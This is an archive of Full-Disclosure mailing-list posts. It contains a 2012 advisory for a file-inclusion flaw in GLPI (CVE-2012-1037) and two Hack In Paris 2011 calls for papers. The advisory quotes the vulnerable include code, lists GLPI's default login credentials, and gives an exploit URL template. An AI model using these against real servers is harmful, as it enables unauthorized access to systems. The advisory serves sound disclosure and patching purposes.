[Full-disclosure] CVE-2012-1037: GLPI <= 0.80.61 LFI/RFI
CVE-2012-1037: GLPI <= 0.80.61 LFI/RFI Severity: Important Vendor: GLPI - http://www.glpi-project.org Versions Affected = All versions between 0.78 and 0.80.61 Description === GLPI fails to properly sanitize the GET 'sub_type' parameter in the front/popup.php file: [...] checkLoginUser(); if (isset($_GET["popup"])) { $_SESSION["glpipopup"]["name"] = $_GET["popup"]; } if (isset($_SESSION["glpipopup"]["name"])) { switch ($_SESSION["glpipopup"]["name"]) { [...] case "add_ruleparameter" : popHeader($LANG['ldap'][35], $_SERVER['PHP_SELF']); include strtolower($_GET['sub_type']."Parameter.php"); // <=== break; [...] To be triggered, the attacker needs to be authenticated. However, GLPI provides default accounts that often aren't changed or disabled: glpi/glpi tech/tech normal/normal post-only/postonly Impact == Since there is a suffix, the vulnerability can be used as a RFI (requires allow_url_include = On). For LFI, the target file has to end up with "parameter.php". GLPI automatically escapes all GET and POST parameters with addslashes(), so the null byte technique is not usable. I have not tested exploitation using path truncation technique but it might be possible. Mitigation == Upgrade to GLPI 0.80.7. Exploit === http:///front/popup.php?popup=add_ruleparameter&sub_type= Timeline 08 feb 2012 - Found the bug. 09 feb 2012 - Contacted the GLPI Team. 09 feb 2012 - Bug fixed & new version available. Thanks to the GLPI team for being responsive! References == http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1037 https://forge.indepnet.net/projects/glpi/versions/685 https://forge.indepnet.net/projects/glpi/repository/revisions/17457/diff/branches/0.80-bugfixes/front/popup.php -- Emilien Girault ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Hack In Paris 2011 Call For Papers Reminder
Hello FD! This is just a reminder that the Call for Papers for Hack In Paris 2011 is closing on 30th of March. We've received some very nice submissions so far. Hack In Paris will take place in Disneyland Paris Conference Center and will be split into two parts: * June 14-15: Trainings * June 16-17: Talks Please do not hesitate to submit! Your submission should contain the following elements: * The biography of each author * A short description (abstract) of your presentation * The summary of your research, including technical information; in particular novel research with regards to the state of the art * An estimation of your expenses (trip and hotel) Please send your proposal to cfp[at]hackinparis[dot]com. Contact & Social Media == Contact:info[at]hackinparis[dot]com Website:http://www.hackinparis.com/ Twitter:http://twitter.com/hackinparis Facebook: http://www.facebook.com/pages/Hack-In-Paris/134611446603792 Linkedin: http://www.linkedin.com/groups?gid=3750882 -- the HIP team ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Hack In Paris 2011 Call For Papers
Hack In Paris 2011 http://www.hackinparis.com/ Call For Papers Introduction Since 2004, Sysdream and HZV have organized the "Nuit du Hack" (Hacker's Night) event in Paris, France. After the success of last year with more than 600 attendees, we are planning a more international and corporate event. Aiming to bring together security professionals and enthusiasts, Hack In Paris will focus on the latest advances in IT security. The conference will be held at Disney's Conference Centre in Disneyland Paris from June 16th to 17th of 2011. This place is easily accessible by train (15mn ride) from downtown Paris and airports. Topics == The following list contains major topics the conference will cover. Please consider submitting even if the subject of your research is not listed here. * Advances in reverse engineering * Vulnerability research and exploitation * Penetration testing and security assessment * Malware analysis and new trends in malicious codes * Forensics, IT crime & law enforcement * Privacy issues: LOPPSI, HADOPI, ... * Low-level hacking (console security & mobile devices) * Risk management and ISO 27001 How to submit? == Submissions should contain the following elements: * The biography of each author * A short description (abstract) of your presentation * The summary of your research, including technical information; in particular novel research with regards to the state of the art * An estimation of your expenses (trip and hotel) Plase send your proposal to cfp[at]hackinparis[dot]com. Note: presentations will take about 45 minutes, including 5 to 10 minutes of questions. All submissions will be reviewed by our program committee. Authors will be notified upon acceptance of their talk. Upcoming dates == January 20 CFP announced April 31Submission deadline May 15 Notification sent to authors May 17 Program announcement June 16-17 Hack In Paris June 18 Nuit du Hack Trainings = We are also looking for experienced professionals to give one or two-day trainings. Contact trainings[at]hackinparis[dot]com. Contact & Social Media == Contact:info[at]hackinparis[dot]com Twitter:http://twitter.com/hackinparis Facebook: http://www.facebook.com/pages/Hack-In-Paris/134611446603792 Linkedin: http://www.linkedin.com/groups?gid=3750882 Thank you very much, and we hope to see you soon in Paris! -- the HIP team ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/